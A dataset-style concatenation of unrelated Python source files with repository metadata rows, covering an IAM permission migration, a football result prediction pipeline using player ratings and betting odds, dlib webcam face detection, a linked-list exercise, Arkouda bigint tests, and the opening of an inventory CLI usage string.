"project_view",
"project_edit",
"project_fast_create_task",
"flow_create",
"flow_view",
"flow_edit",
"flow_delete",
"flow_create_task",
"flow_create_mini_app",
"flow_create_periodic_task",
"task_view",
"task_operate",
"task_edit",
"task_claim",
"task_delete",
"task_clone",
"mini_app_view",
"mini_app_edit",
"mini_app_delete",
"mini_app_create_task",
"periodic_task_view",
"periodic_task_edit",
"periodic_task_delete",
],
"aggregate_resource_type": {"system_id": "bk_sops", "id": "project"},
},
{
"system_id": "bk_sops",
"action_ids": ["common_flow_delete", "common_flow_edit", "common_flow_view"],
"aggregate_resource_type": {"system_id": "bk_sops", "id": "common_flow"},
},
{
"system_id": "bk_ci",
"action_ids": [
"project_view",
"project_edit",
"project_delete",
"project_manage",
"pipeline_view",
"pipeline_edit",
"pipeline_create",
"pipeline_download",
"pipeline_delete",
"pipeline_share",
"pipeline_execute",
"repertory_view",
"repertory_edit",
"repertory_create",
"repertory_delete",
"repertory_use",
"credential_view",
"credential_edit",
"credential_create",
"credential_delete",
"credential_use",
"cert_view",
"cert_edit",
"cert_create",
"cert_delete",
"cert_use",
"environment_view",
"environment_edit",
"environment_create",
"environment_delete",
"environment_use",
"env_node_view",
"env_node_edit",
"env_node_create",
"env_node_delete",
"env_node_use",
],
"aggregate_resource_type": {"system_id": "bk_ci", "id": "project"},
},
{
"system_id": "bk_nodeman",
"action_ids": [
"agent_view",
"agent_operate",
"proxy_operate",
"plugin_view",
"plugin_operate",
"task_history_view",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_nodeman",
"action_ids": ["cloud_edit", "cloud_delete", "cloud_view"],
"aggregate_resource_type": {"system_id": "bk_nodeman", "id": "cloud"},
},
{
"system_id": "bk_nodeman",
"action_ids": ["ap_delete", "ap_edit", "ap_view"],
"aggregate_resource_type": {"system_id": "bk_nodeman", "id": "ap"},
},
]
| TencentBlueKing/bk-iam-saas | saas/backend/apps/action/migrations/0002_auto_20200812_1159.py | 0002_auto_20200812_1159.py | py | 10,685 | python | en | code | 24 | github-code | 13 |
1951632795 | import sqlite3
import pandas as pd
import numpy as np
import os.path
import seaborn as sns
import itertools
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from sklearn import svm
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn import model_selection
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from time import time
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import warnings
warnings.simplefilter("ignore")
#check
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Gets players data (fifa data) for all matches ---------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_football_matches_data(matches, player_skills):
print("Collecting players skills data for each match...")
start = time()
# get all players skills for each match
matches_total_data = matches.apply(lambda x: get_players_match_skills(x, player_skills), axis=1)
end = time()
print("Players skills for each match collected in {:.1f} minutes".format((end - start) / 60))
# Return fifa_data
return matches_total_data
#Aggregates players skills for a given match.
def get_players_match_skills(match, players_skills):
# Define variables
match_id = match.match_api_id
date = match['date']
players = ['home_player_1', 'home_player_2', 'home_player_3', "home_player_4", "home_player_5",
"home_player_6", "home_player_7", "home_player_8", "home_player_9", "home_player_10",
"home_player_11", "away_player_1", "away_player_2", "away_player_3", "away_player_4",
"away_player_5", "away_player_6", "away_player_7", "away_player_8", "away_player_9",
"away_player_10", "away_player_11"]
players_update_skills = pd.DataFrame()
names = []
# Loop through all players
for player in players:
# Get player ID
player_id = match[player]
# Get player skills
player_skills = players_skills[players_skills.player_api_id == player_id]
# get the last update skills
player_skills = player_skills[player_skills.date < date].sort_values(by='date', ascending=False)[:1]
if np.isnan(player_id) == True:
overall_rating = pd.Series(0)
else:
player_skills.reset_index(inplace=True, drop=True)
#The total ranking skills of player
overall_rating = pd.Series(player_skills.loc[0, "overall_rating"])
# Rename stat
name = "{}_overall_rating".format(player)
names.append(name)
players_update_skills = pd.concat([players_update_skills, overall_rating], axis=1)
players_update_skills.columns = names
players_update_skills['match_api_id'] = match_id
players_update_skills.reset_index(inplace=True, drop=True)
# Return player stats
return players_update_skills.ix[0]
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Get overall players rankings --------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_overall_ranking_skills(matches_players_data, get_overall=False):
temp_data = matches_players_data
# Check if only overall player stats are desired
if get_overall == True:
# Get overall stats
data = temp_data.loc[:, (matches_players_data.columns.str.contains('overall_rating'))]
data.loc[:, 'match_api_id'] = temp_data.loc[:, 'match_api_id']
else:
# Get all stats except for stat date
cols = matches_players_data.loc[:, (matches_players_data.columns.str.contains('date_stat'))]
temp_data = matches_players_data.drop(cols.columns, axis=1)
data = temp_data
# Return data
return data
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Get the last x matches of a given team ----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_last_matches(matches, date, team, x=10):
# Filter team matches from matches
team_matches = matches[(matches['home_team_api_id'] == team) | (matches['away_team_api_id'] == team)]
# Filter x last matches from team matches
last_matches = team_matches[team_matches.date < date].sort_values(by='date', ascending=False).iloc[0:x, :]
# Return last matches
return last_matches
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------- Get the last x matches of two given teams ----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_last_matches_against_eachother(matches, date, home_team, away_team, x=10):
# Find matches of both teams
home_matches = matches[(matches['home_team_api_id'] == home_team) & (matches['away_team_api_id'] == away_team)]
away_matches = matches[(matches['home_team_api_id'] == away_team) & (matches['away_team_api_id'] == home_team)]
total_matches = pd.concat([home_matches, away_matches])
# Get last x matches
try:
last_matches = total_matches[total_matches.date < date].sort_values(by='date', ascending=False).iloc[0:x, :]
except:
last_matches = total_matches[total_matches.date < date].sort_values(by='date', ascending=False).iloc[
0:total_matches.shape[0], :]
# Check for error in data
if (last_matches.shape[0] > x):
print("Error in obtaining matches")
return last_matches
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------- Get the goals of a specfic team from a set of matches ----------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_goals(matches, team):
# Find home and away goals
home_goals = int(matches.home_team_goal[matches.home_team_api_id == team].sum())
away_goals = int(matches.away_team_goal[matches.away_team_api_id == team].sum())
total_goals = home_goals + away_goals
# Return total goals
return total_goals
# ----------------------------------------------------------------------------------------------------------------------
# ------------------------------- Get the goals conceided of a specific team from a set of matches ---------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_goals_conceided(matches, team):
# Find home and away goals
home_goals = int(matches.home_team_goal[matches.away_team_api_id == team].sum())
away_goals = int(matches.away_team_goal[matches.home_team_api_id == team].sum())
total_goals = home_goals + away_goals
# Return total num of goals
return total_goals
# ----------------------------------------------------------------------------------------------------------------------
# ------------------------------- Get the number of wins of a specific team from a set of matches-----------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_wins(matches, team):
# Find home and away wins
home_wins = int(matches.home_team_goal[
(matches.home_team_api_id == team) & (matches.home_team_goal > matches.away_team_goal)].count())
away_wins = int(matches.away_team_goal[
(matches.away_team_api_id == team) & (matches.away_team_goal > matches.home_team_goal)].count())
total_wins = home_wins + away_wins
# Return total wins
return total_wins
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------Create match specific features for a given match -----------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_match_features(match, matches, x=10):
# Define variables
date = match.date
home_team = match.home_team_api_id
away_team = match.away_team_api_id
# Get last x matches of home and away team
matches_home_team = get_last_matches(matches, date, home_team, x=10)
matches_away_team = get_last_matches(matches, date, away_team, x=10)
# Get last x matches of both teams against each other
last_matches_against = get_last_matches_against_eachother(matches, date, home_team, away_team, x=4)
# Create goal variables
home_goals = get_goals(matches_home_team, home_team)
away_goals = get_goals(matches_away_team, away_team)
home_goals_conceided = get_goals_conceided(matches_home_team, home_team)
away_goals_conceided = get_goals_conceided(matches_away_team, away_team)
# Define result data frame
result = pd.DataFrame()
# Define ID features
result.loc[0, 'match_api_id'] = match.match_api_id
result.loc[0, 'league_id'] = match.league_id
# Create match features
result.loc[0, 'home_team_goals_difference'] = home_goals - home_goals_conceided
result.loc[0, 'away_team_goals_difference'] = away_goals - away_goals_conceided
result.loc[0, 'games_won_home_team'] = get_wins(matches_home_team, home_team)
result.loc[0, 'games_won_away_team'] = get_wins(matches_away_team, away_team)
result.loc[0, 'games_against_won'] = get_wins(last_matches_against, home_team)
result.loc[0, 'games_against_lost'] = get_wins(last_matches_against, away_team)
# Return match features
return result.loc[0]
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------------Derives a label for a given match -----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_match_label_result(match):
# Define variables
home_goals = match['home_team_goal']
away_goals = match['away_team_goal']
label = pd.DataFrame()
label.loc[0, 'match_api_id'] = match['match_api_id']
# Identify match label
if home_goals > away_goals:
label.loc[0, 'label'] = "Win"
if home_goals == away_goals:
label.loc[0, 'label'] = "Draw"
if home_goals < away_goals:
label.loc[0, 'label'] = "Defeat"
# Return label
return label.loc[0]
#----------------------------------------------------------------------------------------------------------------------
#-------------------------------------------Converts site odds to probabilities. --------------------------------------
#----------------------------------------------------------------------------------------------------------------------
def convert_odds_to_prob(match_odds):
# Define variables
match_id = match_odds.loc[:, 'match_api_id']
site_odd = match_odds.loc[:, 'site_odd']
win_odd = match_odds.loc[:, 'Win']
draw_odd = match_odds.loc[:, 'Draw']
loss_odd = match_odds.loc[:, 'Defeat']
# Converts odds to prob
win_prob = 1 / win_odd
draw_prob = 1 / draw_odd
loss_prob = 1 / loss_odd
total_prob = win_prob + draw_prob + loss_prob
probs = pd.DataFrame()
# Define output format and scale probs by sum over all probs
probs.loc[:, 'match_api_id'] = match_id
probs.loc[:, 'site_odd'] = site_odd
probs.loc[:, 'Win'] = win_prob / total_prob
probs.loc[:, 'Draw'] = draw_prob / total_prob
probs.loc[:, 'Defeat'] = loss_prob / total_prob
# Return probs and meta data
return probs
#-----------------------------------------------------------------------------------------------------------------------
#---------------------- Aggregates bet sites odds data for all matches and sites ---------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def get_bets_odds_data(matches, bet_sites_selected, horizontal=True):
odds_data = pd.DataFrame()
# Loop through bet sites
for bet_site_odd in bet_sites_selected:
# Find columns containing data of site odds
temp_data = matches.loc[:, (matches.columns.str.contains(bet_site_odd))]
temp_data.loc[:, 'site_odd'] = str(bet_site_odd)
temp_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
# Rename odds columns and convert to numeric
cols = temp_data.columns.values
cols[:3] = ['Win', 'Draw', 'Defeat']
temp_data.columns = cols
temp_data.loc[:, 'Win'] = pd.to_numeric(temp_data['Win'])
temp_data.loc[:, 'Draw'] = pd.to_numeric(temp_data['Draw'])
temp_data.loc[:, 'Defeat'] = pd.to_numeric(temp_data['Defeat'])
# Check if data should be aggregated horizontally
if (horizontal == True):
# Convert data to probs
temp_data = convert_odds_to_prob(temp_data)
temp_data.drop('match_api_id', axis=1, inplace=True)
temp_data.drop('site_odd', axis=1, inplace=True)
# Rename columns with bookkeeper names
win_name = bet_site_odd + "_" + "Win"
draw_name = bet_site_odd + "_" + "Draw"
defeat_name = bet_site_odd + "_" + "Defeat"
temp_data.columns.values[:3] = [win_name, draw_name, defeat_name]
# Aggregate data
odds_data = pd.concat([odds_data, temp_data], axis=1)
else:
# Aggregate vertically
odds_data = odds_data.append(temp_data, ignore_index=True)
# If horizontal add match api id to data
if (horizontal == True):
temp_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
# Return site_odds data
return odds_data
#-----------------------------------------------------------------------------------------------------------------------
#--------------------------------Create and aggregate features and labels for all matches-------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def create_features(matches, matches_players_data, bet_sites_selected_cols, get_overall=False, horizontal=True, x=10, verbose=True):
# Get players skills for features
players_skills = get_overall_ranking_skills(matches_players_data, get_overall)
if verbose == True:
print("Generating match features...")
start = time()
# Get match features for all matches
match_stats = matches.apply(lambda x: get_match_features(x, matches, x=10), axis=1)
match_stats.drop(['league_id'], inplace=True, axis=1)
end = time()
if verbose == True:
print("Match features generated in {:.1f} minutes".format((end - start) / 60))
if verbose == True:
print("Generating match labels...")
start = time()
# Create match labels (axis =1 means apply function to each row.)
labels = matches.apply(get_match_label_result, axis=1)
end = time()
if verbose == True:
print("Match labels generated in {:.1f} minutes".format((end - start) / 60))
if verbose == True:
print("Generating bet sites odds data...")
start = time()
# Get bet odds for all matches
bets_odds_data = get_bets_odds_data(matches, bet_sites_selected_cols, horizontal=True)
bets_odds_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
end = time()
if verbose == True:
print("bet sites odds data generated in {:.1f} minutes".format((end - start) / 60))
# Merges features and labels into one frame
features = pd.merge(match_stats, players_skills, on='match_api_id', how='left')
features = pd.merge(features, bets_odds_data, on='match_api_id', how='left')
last_features = pd.merge(features, labels, on='match_api_id', how='left')
# fill_nan_values(feables)- choose not to use!
# Drop NA values
last_features.dropna(inplace=True)
# Return preprocessed data
return last_features
# fill missing values of bet sites odds with average
def fill_nan_values(features):
features["B365_Win"] = features["B365_Win"].fillna(value=features["B365_Win"].mean())
features["B365_Draw"] = features["B365_Draw"].fillna(value=features["B365_Draw"].mean())
features["B365_Defeat"] = features["B365_Defeat"].fillna(value=features["B365_Defeat"].mean())
features["BW_Win"] = features["BW_Win"].fillna(value=features["BW_Win"].mean())
features["BW_Draw"] = features["BW_Draw"].fillna(value=features["BW_Draw"].mean())
features["BW_Defeat"] = features["BW_Defeat"].fillna(value=features["BW_Defeat"].mean())
features["IW_Win"] = features["IW_Win"].fillna(value=features["IW_Win"].mean())
features["IW_Draw"] = features["IW_Draw"].fillna(value=features["IW_Draw"].mean())
features["IW_Defeat"] = features["IW_Defeat"].fillna(value=features["IW_Defeat"].mean())
features["LB_Win"] = features["LB_Win"].fillna(value=features["LB_Win"].mean())
features["LB_Draw"] = features["LB_Draw"].fillna(value=features["LB_Draw"].mean())
features["LB_Defeat"] = features["LB_Defeat"].fillna(value=features["LB_Defeat"].mean())
return features
#-----------------------------------------------------------------------------------------------------------------------
#------------------------------------------------- Plot confusion Matrix------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.show()
#-----------------------------------------------------------------------------------------------------------------------
#----------------------------------------- Create featuers for train/test datasets--------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def start_create_features():
# Connecting to database
path = "D:\dataset" # Insert path here
database = path+'database.sqlite'
connection = sqlite3.connect(database)
#Extract required data to tables - SQL
#players football skills data
player_skills_data = pd.read_sql("SELECT * FROM Player_Attributes;", connection)
# matches train data- seasons: 2008/2009-2014/2015:
matches_data = pd.read_sql("SELECT * FROM Match where season is not '2015/2016' ;", connection)
data_columns = ["country_id", "league_id", "season", "stage", "date", "match_api_id", "home_team_api_id",
"away_team_api_id", "home_team_goal", "away_team_goal", "home_player_1", "home_player_2",
"home_player_3", "home_player_4", "home_player_5", "home_player_6", "home_player_7",
"home_player_8", "home_player_9", "home_player_10", "home_player_11", "away_player_1",
"away_player_2", "away_player_3", "away_player_4", "away_player_5", "away_player_6",
"away_player_7", "away_player_8", "away_player_9", "away_player_10", "away_player_11"]
matches_data.dropna(subset = data_columns, inplace = True)
# matches_data = matches_data.tail(3000)
# Generating features, exploring the data, and preparing data for model training.
# to each match, complete players skills data that play in the same match
matches_players_train_data = get_football_matches_data(matches_data, player_skills_data)
#Creating features and labels of for matches based on players skills, bet odds and data of last past games.
bet_sites_selected_cols = ['B365', 'BW', 'IW','LB']
#prepare train dataset features
train_features = create_features(matches_data, matches_players_train_data, bet_sites_selected_cols, get_overall = True)
train_features.to_csv('train_data.csv', index=False, header=True)
#prepare test dataset features- seasons: 2015/2016
test_matches_data = pd.read_sql("SELECT * FROM Match where season is '2015/2016' ;", connection)
test_matches_data.dropna(subset = data_columns, inplace = True)
# test_matches_data = test_matches_data.tail(3000)
matches_players_test_data = get_football_matches_data(test_matches_data, player_skills_data)
test_features = create_features(test_matches_data, matches_players_test_data, bet_sites_selected_cols, get_overall = True)
test_features.to_csv('test_data.csv', index=False, header=True)
#-----------------------------------------------------------------------------------------------------------------------
#------------------------------------------------------- Start----------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
if(not os.path.exists('train_data.csv') and not os.path.exists('test_data.csv')):
start_create_features()
train_features = pd.read_csv('train_data.csv')
test_features = pd.read_csv('test_data.csv')
labels_train_result = train_features.loc[:,'label']
train_features = train_features.drop('label', axis = 1)
labels_test_result = test_features.loc[:,'label']
test_features = test_features.drop('label', axis = 1)
#---------------------------------------------------------------------------------------------------------------------
#----------------------------------------------- Train models and show results----------------------------------------
#---------------------------------------------------------------------------------------------------------------------
print ("Models training details:")
k_fold = KFold(n_splits=10, shuffle=True,random_state=0)
LGR_chosen = False
KNN_chosen = False
DT_chosen = False
NB_chosen = False
SVM_chosen = False
RF_chosen = False
best_score = 0
#--Logistic Regression--
print("Logistic Regression model:")
clf = LogisticRegression()
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_lgr = round(np.mean(score)*100,2)
print("The average score is:", average_score_lgr)
if (average_score_lgr > best_score):
best_score= average_score_lgr
LGR_chosen = True
KNN_chosen = False
DT_chosen = False
NB_chosen = False
SVM_chosen = False
RF_chosen = False
#--KNN--
print("Knn model:")
clf = KNeighborsClassifier(n_neighbors= 30)
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_knn = round(np.mean(score)*100,2)
print("The average score is:", average_score_knn)
if (average_score_knn > best_score):
best_score= average_score_knn
LGR_chosen = False
KNN_chosen = True
DT_chosen = False
NB_chosen = False
SVM_chosen = False
RF_chosen = False
#--Decision Tree--
print("Decision Tree model:")
clf = DecisionTreeClassifier()
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_dt = round(np.mean(score)*100,2)
print("The average score is:", average_score_dt)
if (average_score_dt > best_score):
best_score= average_score_dt
LGR_chosen = False
KNN_chosen = False
DT_chosen = True
NB_chosen = False
SVM_chosen = False
RF_chosen = False
#--Naive Bayes--
print("Naive Bayes model:")
clf = GaussianNB()
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_nb = round(np.mean(score)*100,2)
print("The average score is:", average_score_nb)
if (average_score_nb > best_score):
best_score= average_score_nb
LGR_chosen = False
KNN_chosen = False
DT_chosen = False
NB_chosen = True
SVM_chosen = False
RF_chosen = False
#--SVM--
print("SVM model:")
clf = SVC(kernel='rbf',C=0.8,gamma=0.4)
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_svm = round(np.mean(score)*100,2)
print("The average score is:", average_score_svm)
if (average_score_svm > best_score):
best_score= average_score_svm
LGR_chosen = False
KNN_chosen = False
DT_chosen = False
NB_chosen = False
SVM_chosen = True
RF_chosen = False
#--Random Forest--
print("Random Forest model:")
clf = RandomForestClassifier(n_estimators=25, min_samples_split=25, max_depth=10, max_features='auto')
scoring ='accuracy'
score = cross_val_score(clf ,train_features,labels_train_result,cv= k_fold,n_jobs=1, scoring= scoring)
average_score_rf = round(np.mean(score)*100,2)
print("The average score is:", average_score_rf)
if (average_score_rf > best_score):
best_score= average_score_rf
LGR_chosen = False
KNN_chosen = False
DT_chosen = False
NB_chosen = False
SVM_chosen = False
RF_chosen = True
#---------------------------------------------------------------------------------------------------------------------
#----------------------------------------------- plot bar chart of train results--------------------------------------
#---------------------------------------------------------------------------------------------------------------------
labels_classes = ['Defeat','Draw','Win']
#plot models training results 1:
x = ['Logisic Regression', 'KNN', 'Decision Tree', 'Naive Bayes', 'SVM', 'Random Forest']
y = [average_score_lgr, average_score_knn, average_score_dt, average_score_nb, average_score_svm, average_score_rf]
fig, ax = plt.subplots()
width = 0.5 # the width of the bars
ind = np.arange(len(y)) # the x locations for the groups
ax.barh(ind, y, width, color="blue")
ax.set_yticks(ind+width/2)
ax.set_yticklabels(x, minor=False)
plt.title('Models training results:')
plt.xlabel('Accuracy')
plt.ylabel('Models')
for i, v in enumerate(y):
ax.text(v+0.2 , i, str(v), color='blue', fontweight='bold')
plt.show()
#plot models training results 2:
objects = ('Logisic Regression', 'KNN', 'Decision Tree', 'Naive Bayes', 'SVM', 'Random Forest')
y_pos = np.arange(len(objects))
performance = [average_score_lgr, average_score_knn, average_score_dt, average_score_nb, average_score_svm, average_score_rf]
plt.bar(y_pos, performance, align='center', alpha=0.2)
plt.xticks(y_pos, objects)
plt.ylabel('Accuracy')
plt.title('Models training results:')
plt.show()
#---------------------------------------------------------------------------------------------------------------------
#--------------------------------------------- Test and envaluate the best model--------------------------------------
#---------------------------------------------------------------------------------------------------------------------
if (LGR_chosen == True):
print("The chosen model to test is Logisic Regression:")
model_chosen = LogisticRegression()
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
if (KNN_chosen == True):
print("The chosen model to test is KNN:")
model_chosen = KNeighborsClassifier(n_neighbors= 30)
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
if (DT_chosen == True):
print("The chosen model to test is Decision Tree:")
model_chosen = DecisionTreeClassifier()
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
if (NB_chosen == True):
print("The chosen model to test is Naive Bayes:")
model_chosen = GaussianNB()
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
if (SVM_chosen == True):
print("The chosen model to test is SVM:")
model_chosen = SVC(kernel='rbf',C=0.24,gamma=0.15)
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
if (RF_chosen == True):
print("The chosen model to test is Random Forest:")
model_chosen = RandomForestClassifier(n_estimators=25, min_samples_split=25, max_depth=10, max_features='auto')
model_chosen.fit(train_features,labels_train_result)
predictions = model_chosen.predict(test_features)
print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
print('Classification Report:')
print(classification_report(labels_test_result, predictions))
print('Confusion Matrix:')
cnf_matrix = confusion_matrix(labels_test_result, predictions)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=labels_classes,
title='Confusion matrix, without normalization')
| ShayEK34/SoccerProject-DataAnalysis-Python | MLmodel.py | MLmodel.py | py | 33,581 | python | en | code | 0 | github-code | 13 |
9436842940 | # coding=utf-8
import cv2
import dlib
detector = dlib.get_frontal_face_detector()
win = dlib.image_window()
# cap = cv2.VideoCapture('E:\Python\PycharmProjects\ImgHash\Opencv\\1.mp4')
cap = cv2.VideoCapture(0)
while cap.isOpened():
ret, cv_img = cap.read()
# OpenCV默认RGB图像,dlib BGR图像
img = cv2.cvtColor(cv_img, cv2.COLOR_RGB2BGR)
dets = detector(img, 0)
# print("Number of faces detected: {}".format(len(dets)))
# for i, d in enumerate(dets):
# print("Detection {}: Left: {} Top: {} Right: {} Bottom: {}".format(
# i, d.left(), d.top(), d.right(), d.bottom()))
win.clear_overlay()
win.set_image(img)
win.add_overlay(dets)
cap.release() | swiich/face_recognize | recVideo.py | recVideo.py | py | 713 | python | en | code | 0 | github-code | 13 |
4210600650 | from typing import Optional
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def odd_even_list(self, head: Optional[ListNode]) -> Optional[ListNode]:
if not head:
return None
odd = head
even = head.next
even_head = even
while even and even.next:
odd.next = even.next
odd = odd.next
even.next = odd.next
even = even.next
odd.next = even_head
return head
if __name__ == "__main__":
one = ListNode(1)
two = ListNode(2)
three = ListNode(3)
four = ListNode(4)
five = ListNode(5)
one.next = two
two.next = three
three.next = four
four.next = five
five.next = None
out = Solution().odd_even_list(one)
while out:
print(out.val)
out = out.next
| mhasan09/leetCode_M | odd_even_linkedlist.py | odd_even_linkedlist.py | py | 906 | python | en | code | 0 | github-code | 13 |
32045601690 | import numpy as np
import pytest
import arkouda as ak
def gather_scatter(a):
rev = ak.array(np.arange(len(a) - 1, -1, -1))
a2 = a[rev]
res = ak.zeros(len(a), dtype=a.dtype)
res[:] = a2
res[rev] = a2
return res
class TestBigInt:
@pytest.mark.parametrize("size", pytest.prob_size)
def test_negative(self, size):
# test with negative bigint values
arr = -1 * ak.randint(0, 2**32, size)
bi_neg = ak.cast(arr, ak.bigint)
res = gather_scatter(bi_neg)
assert bi_neg.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_large(self, size):
# test with 256 bit bigint values
top_bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
mid_bits1 = ak.randint(0, 2**32, size, dtype=ak.uint64)
mid_bits2 = ak.randint(0, 2**32, size, dtype=ak.uint64)
bot_bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([top_bits, mid_bits1, mid_bits2, bot_bits])
res = gather_scatter(bi_arr)
assert bi_arr.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_zero(self, size):
# test all zero bigint assignments
all_zero = ak.zeros(size, dtype=ak.bigint)
res = gather_scatter(all_zero)
assert all_zero.to_list() == res.to_list()
def test_variable_sized(self):
# 5 bigints of differing number of limbs
bits1 = ak.array([0, 0, 0, 0, 1], dtype=ak.uint64)
bits2 = ak.array([0, 0, 0, 1, 1], dtype=ak.uint64)
bits3 = ak.array([0, 0, 1, 1, 1], dtype=ak.uint64)
bits4 = ak.array([0, 1, 1, 1, 1], dtype=ak.uint64)
bits5 = ak.array([1, 1, 1, 1, 1], dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([bits1, bits2, bits3, bits4, bits5])
res = gather_scatter(bi_arr)
assert bi_arr.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_change_size(self, size):
# Go from 256 bigint values down to just 1
bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([bits, bits, bits, bits])
res = ak.ones_like(bi_arr)
bi_arr[:] = res
assert bi_arr.to_list() == res.to_list()
| Bears-R-Us/arkouda | PROTO_tests/tests/bigint_agg_test.py | bigint_agg_test.py | py | 2,321 | python | en | code | 211 | github-code | 13 |
25556877755 | """
Usage:
inventory add <name> <description> <price> <date_added> <item_id>
inventory remove <item_name>
inventory list
inventory check_out <item_id>
inventory check_in <item_id>
inventory item_view <item_id>
inventory search_inventory <item_name>
inventory assetvalue
inventory list_export <filename>
inventory export
inventory
inventory (-i | --interactive)
inventory (-h | --help)
Options:
